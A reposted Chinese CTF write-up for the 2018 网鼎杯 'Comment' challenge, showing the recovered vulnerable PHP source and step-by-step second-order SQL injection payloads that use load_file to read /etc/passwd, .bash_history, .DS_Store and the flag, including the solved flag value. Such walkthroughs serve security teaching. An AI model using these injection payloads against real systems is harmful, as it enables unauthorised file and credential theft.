[网鼎杯 2018]Comment-1|SQL注入|二次注入

news/2024/4/29 8:06:35/文章来源:https://www.cnblogs.com/upfine/p/16613094.html

1、打开之后只有一个留言页面,很自然的就想到了二次注入得问题,顺带查看了下源代码信息,并没有什么提示,显示界面如下:

2、那先扫描一下目录,同时随便留言一个测试以下,但是显示需要登录,账户、密码给出了部分提示,但是最后三位密码需要爆破,结果如下:

3、扫描到了.git文件,那就使用githack尝试获取下源码信息,但是显示得源码信息不全,需要恢复,(这里在网上找了下,一直恢复不成功,后面再看),结果如下:

githack下载下来的:

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){header("Location: ./login.php");die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':break;
case 'comment':break;
default:header("Location: ./index.php");
}
}
else{header("Location: ./index.php");
}
?>

完整得源码:

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){header("Location: ./login.php");die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':$category = addslashes($_POST['category']);$title = addslashes($_POST['title']);$content = addslashes($_POST['content']);$sql = "insert into boardset category = '$category',title = '$title',content = '$content'";$result = mysql_query($sql);header("Location: ./index.php");break;
case 'comment':$bo_id = addslashes($_POST['bo_id']);$sql = "select category from board where id='$bo_id'";$result = mysql_query($sql);$num = mysql_num_rows($result);if($num>0){$category = mysql_fetch_array($result)['category'];$content = addslashes($_POST['content']);$sql = "insert into commentset category = '$category',content = '$content',bo_id = '$bo_id'";$result = mysql_query($sql);}header("Location: ./comment.php?id=$bo_id");break;
default:header("Location: ./index.php");
}
}
else{header("Location: ./index.php");
}
?>

4、先随便进行一个发帖,然后提交留言,回显了我们的留言信息,那也就确定了二次注入的回显数据的地方,结果如下:

5、对获得的源代码进行分析,服务端在接受到我们的数据之后进行了转义处理(addslashes),但是数据在存到数据库中时还是存储的我们提交的数据,变化过程:'->\'->',结合代码:

$sql = "insert into boardset category = '$category',  //category参数可控title = '$title',content = '$content'";   $sql = "select category from board where id='$bo_id'";   //直接取用我们可以控制的category参数$sql = "insert into commentset category = '$category',          content = '$content', bo_id = '$bo_id'";
//content参数可控并且会展示其内容,调用了我们可控的category参数,所以这条sql语句中就有两个地方我们可以直接控制

我们留言的内容在(content):

 所以我们就需要把我们想看到的信息写入到content中,使其进行展示,加入我们想要获取database()的信息,那我们就应该形成:

$sql = "insert into commentset category = '$category',         content = database(),             bo_id = '$bo_id'";

这里很明显content参数的单引号去掉了,但是content参数有进行转义,所以导致这一情况的只能是category参数,这里想到了之前做过的一道题:https://www.cnblogs.com/upfine/p/16545379.html,通过转义符使&passwd=成为了搜索的用户名内容(见下图),那这里我们也可以采用这种方式,因此构造我们的category的payload:\,我们的content的payload:,content=database(),#。结果如下:

 

6、在网上看到了另外一种方式,就是采用/**/来注释掉原来的content内容,其实两种方式原理差不多,一个是采用/**/注释掉content部分的内容,一个是采用\转移单引号,使content内容成为了category的写入内容(这里写入的是comment表,所以并不会影响原来从board获取的category值,写入之后语句中的category还是\,可以看上面图,在一个发帖中同时获取了user和database),网上category的payload:',content=database(),/*,content的payload:*/#。结果如下:

7、然后就进获取表、列,具体的信息等,但是并没有获取flag,那就应该是存放在系统上的一个文件里了,读取下/etc/passwd,这里不要使用\转义,因为payload中存在单引号,使用这种方式时,导致payload语句中的单引号被转移,而无法执行;

所以这里我们就只能使用/**/注释掉content内容的方式了,category的payload:',content=(select(load_file('/etc/passwd'))),/*,content的payload:*/#,读取的/etc/passwd信息如下:

8、www用户的目录是/home/www,读取一下.bash_history文件,查看下用户使用的命令,category的payload:',content=(select(load_file('/home/www/.bash_history'))),/*,content的payload:*/#,发现了.DS_Store文件,结果如下:

.bash_history文件:

9、那就读取下.DS_Store文件,category的payload:',content=(select(load_file('/home/www/.bash_history'))),/*,content的payload:*/#,结果如下(应该是没有读完):

10、那就使用hex编码读取一下,category的payload:',content=(select hex(load_file('/tmp/html/.DS_Store'))),/*,content的payload:*/#,结果如下:

返回内容如下:

00000001427564310000100000000800000010000000040A000000000000000000000000000000000000000000000800000008000000000000000000000000000000000000000002000000000000000B000000010000100000730074007200610070496C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000B000000090062006F006F007400730074007200610070496C6F63626C6F62000000100000004600000028FFFFFFFFFFFF00000000000B0063006F006D006D0065006E0074002E007000680070496C6F63626C6F6200000010000000CC0000002800000001FFFF000000000003006300730073496C6F63626C6F62000000100000015200000028FFFFFFFFFFFF0000000000190066006C00610067005F0038003900340036006500310066006600310065006500330065003400300066002E007000680070496C6F63626C6F6200000010000001D800000028FFFFFFFFFFFF0000000000050066006F006E00740073496C6F63626C6F62000000100000004600000098FFFFFFFFFFFF0000000000090069006E006400650078002E007000680070496C6F63626C6F6200000010000000CC0000009800000002FFFF000000000002006A0073496C6F63626C6F62000000100000015200000098FFFFFFFFFFFF000000000009006C006F00670069006E002E007000680070496C6F63626C6F6200000010000001D800000098FFFFFFFFFFFF000000000009006D007900730071006C002E007000680070496C6F63626C6F62000000100000004600000108FFFFFFFFFFFF00000000000600760065006E0064006F0072496C6F63626C6F6200000010000000CC00000108FFFFFFFFFFFF00000000000C00770072006900740065005F0064006F002E007000680070496C6F63626C6F62000000100000015200000108FFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000080B000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000002000000001000000400000000100000080000000010000010000000001000002000000000100000400000000000000000100001000000000010000200000000001000040000000000100008000000000010001000000000001000200000000000100040000000000010008000000000001001000000000000100200000000000010040000000000001008000000000000101000000000000010200000000000001040000000000000108000000000000011000000000000001200000000000000140000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000000000000100B000000450000040A000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000104445344420000000100000000000000000000000000000000000000000000000200000020000000600000000000000001000000800000000100000100000000010000020000000000000000020000080000001800000000000000000100002000000000010000400000000001000080000000000100010000000000010002000000000001000400000000000100080000000000010010000000000001002000000000000100400000000000010080000000000001010000000000000102000000000000010400000000000001080000000000000110000000000000012000000000000001400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

进行16进制转换(https://www.toolscat.com/decode/hex),结果如下:

最终成功得到flag文件:flag_8946e1ff1ee3e40f.php。

11、读取下flag文件,category的payload:',content=(select hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*,content的payload:*/#,结果如下:

返回信息如下:

3C3F7068700A0924666C61673D22666C61677B64363335303431392D326336372D343261392D386664352D3538663932653334363631647D223B0A3F3E0A

进行16进制转码,最终成功得到flag:flag{d6350419-2c67-42a9-8fd5-58f92e34661d},结果如下:

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_2624.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

MySQL学习(3)---MySQL常用命令

MySQL学习(3)---MySQL常用命令

ps:此随笔基于mysql 5.7.*版本。 已知root账户密码进行登录 格式:mysql [-h地址] [-p端口] -u用户名 -p密码 省略不写地址或端口则自动使用默认。(地址:localhost;端口:3306) 两种方式进行登录。方式1:方式2:忘记root账户密码进行登录(修改root密码)以管理员身份打开一个…
阅读更多...
爬虫进阶-python爬虫爬取百度图片

爬虫进阶-python爬虫爬取百度图片

爬虫进阶-python爬取百度图片​今天来和大家分享下,如何通过爬虫,爬取百度图片,并下载保存到本地。 一、开发环境 开发环境:python 3.9和sublime_text ps:pycharm今天第一次用,随着将越来越多开发环境集成到vscode上,感觉太复杂了,配置又不太懂,总是有问题,虽然很喜欢…
阅读更多...
前端Day06

前端Day06

HTML5新特性 语义化: 多媒体标签: 新增input类型: 新增表单属性:
阅读更多...
一、对象与类

一、对象与类

已经工作几年了,java,vue,python,C++各种项目都随叫随到,但除了C++其他都没有系统的学习过。这里仅记录下从头学习java基础的过程,和我认为值得记录的一些点,权当做一个备份和文档。 学习参考书:java核心技术 卷1 第九版。家里正好有这本书很多年了,也就看这个了,不是…
阅读更多...
Python自学教程4-数据类型学什么

Python自学教程4-数据类型学什么

Hi,我是九柄,全网同号,今天我们说说Python的数据类型。 python数据类型有什么特点 每一门编程语言都要学数据类型的,每种类型的操作会稍微有一点区别。Python是一门非常灵活的编程语言,数据类型的指定和其他编程语言会稍微有一点区别。 首先,Python 不需要显性声明数据的…
阅读更多...
解析 RocketMQ 业务消息--“顺序消息”

解析 RocketMQ 业务消息--“顺序消息”

本篇将继续业务消息集成的场景,从功能原理、应用案例、最佳实践以及实战等角度介绍 RocketMQ 的顺序消息功能。作者:绍舒 引言 Apache RocketMQ 诞生至今,历经十余年大规模业务稳定性打磨,服务了阿里集团内部业务以及阿里云数以万计的企业客户。作为金融级可靠的业务消息方…
阅读更多...
C# 读取MotherBoard的信息

C# 读取MotherBoard的信息

通过C# 来读取PC 的MotherBoard 上的信息,如 产品名称,制造商,版本等,方法如下:Reference中添加 System.Management,并在头文件中引入该 Assemble 添加对应的类,并进行使用,如下实例:public static class MotherBoardInfo{private static ManagementObjectSearcher …
阅读更多...
万物皆可集成系列:低代码释放用友U8+深度价值(2)—数据拓展应用

万物皆可集成系列:低代码释放用友U8+深度价值(2)—数据拓展应用

在上一篇内容我们介绍了如何利用低代码开发套件实现低代码应用与U8+系统的对接集成,本次给大家带来的是如何将用友U8+系统中的数据进行价值扩展和实际应用。 我们以生产物料齐套分析为例来说明如何利用低代码将U8+系统中的系统进行扩展和应用。在开始之前,先来看看什么是生产…
阅读更多...
java数据类型转换问题

java数据类型转换问题

我们知道java中的各个数据类型的取值范围不同,可以理解成容量大小,而针对容量大小可以对他们进行一个由低到高的排序,也就是优先级。 优先级 低-----------------------------------------------------------------------高 (byte,short,char)=> int => long => …
阅读更多...
记esxi linux主机调整分区大小

记esxi linux主机调整分区大小

调整前效果:调整后效果: 方法如下: 工具:VMware vCenter Converter
阅读更多...
顶象为飞凡汽车App提供全方位防护 助力新能源汽车发展

顶象为飞凡汽车App提供全方位防护 助力新能源汽车发展

汽车App集展示、体验、交互、交易和远程服务于一身,已成为智能汽车的一部分。日前,飞凡汽车与顶象达成合作,为飞凡汽车App提供安全加固服务,为用户提供全方位的安全保障。 用户眼里的“宝藏App” 每个智能汽车都有一个App,大多数将其当做车的附加服务,飞凡汽车把App当做汽…
阅读更多...
Fecify 跨境电商系统,有哪些优势?

Fecify 跨境电商系统,有哪些优势?

独立站是最近几年重新火爆起来的跨境电商经营方式。人都喜欢一切都掌握在自己手里的感觉,而独立站的好处就是自己说了算,足够自由。因为可以自己说了算,风险自己把控,自己做的事情,自己负责,独立站的这些自主特性深受货代人的喜爱。独立站以其独立自主的特性,引领未来跨…
阅读更多...
删除RAID

删除RAID

场景 当服务器不需要RAID或重新配置RAID时,要先删除当前RAID配置来释放硬盘。 LSI SAS2208 (Legacy/Dual) 操作步骤 步骤1 通过远程虚拟控制台登录到服务器的实时操作桌面。 步骤2 登录CU管理界面。 步骤3 备份删除RAID中的数据。 步骤4 删除RAID。 1. 在CU主界面左侧区域中选…
阅读更多...
HTML基础(二):标签学习

HTML基础(二):标签学习

html学习笔记排版标签 标题标签场景:在新闻和文章的页面中,都离不开标题,用来突出显示文章主题代码:h系列标签<h1>1级标题</h1> <h2>2级标题</h2> <h3>3级标题</h3> <h4>4级标题</h4> <h5>5级标题</h5> <h…
阅读更多...
电商行业:全链路监测广告投放效果,用数据驱动业务增长

电商行业:全链路监测广告投放效果,用数据驱动业务增长

哪个营销任务、营销渠道的引流用户更多? 买量用户的活跃、留存情况如何? 哪个营销任务引流的用户后续的加购、下单转化最多? HMS Core分析服务作为广告转化跟踪工具,广告主可实现从“曝光、点击、下载、激活、注册、留存、收藏、加入购物车、下单、开始结算、支付成功、复购…
阅读更多...
35. Redis---缓存问题

35. Redis---缓存问题

1. 前言 在实际的业务场景中,Redis 一般和其他数据库搭配使用,用来减轻后端数据库的压力,比如和关系型数据库 MySQL 配合使用。Redis 会把 MySQL 中经常被查询的数据缓存起来,比如热点数据,这样当用户来访问的时候,就不需要到 MySQL 中去查询了,而是直接获取 Redis 中的…
阅读更多...
面试突击77:Spring 依赖注入有几种?各有什么优缺点?

面试突击77:Spring 依赖注入有几种?各有什么优缺点?

IoC 和 DI 是 Spring 中最重要的两个概念,其中 IoC(Inversion of Control)为控制反转的思想,而 DI(Dependency Injection)依赖注入为其(IoC)具体实现。那么 DI 实现依赖注入的方式有几种?这些注入方式又有什么不同?接下来,我们一起来看。 0.概述 在 Spring 中实现依…
阅读更多...
[AcWing 167] 木棒

[AcWing 167] 木棒

DFS 剪枝点击查看代码 #include<bits/stdc++.h>using namespace std;typedef long long LL;const int N = 1e6 + 10;int n; int w[N]; int sum, len; bool st[N];bool dfs(int u, int s, int start) {if (u * len == sum)return true;if (s == len)return dfs(u + 1, 0, …
阅读更多...
Word修订内容批量标红

Word修订内容批量标红

Word修订标红Plus,适用于科研狗最近改文章,期刊要求提供所有修改内容都标红的修订稿,本着能不手改就不手改的原则,我尝试检索了一下自动修改的方法,最先找到的是简书上的一篇使用VB宏命令批量修改的文章 (Word-接受全部修订为标红字体),但是尝试之后发现运行时间很长,且…
阅读更多...
《GB27607-2011》PDF下载

《GB27607-2011》PDF下载

《GB27607-2011 机械压力机 安全技术要求》PDF下载 《GB27607-2011》简介本标准规定了机械压力机类产品的设计、制造、改造、使用的术语和定义、严重危险、安全要求和(或)措施、检验和使用信息; 本标准适用于压力机及作为压力机组成部分的辅助设备的设计、制造、改造和使用,也…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023

友情链接: 我的编程经验分享 一条长河网 尧图网站开发 尧图建网站 广利置业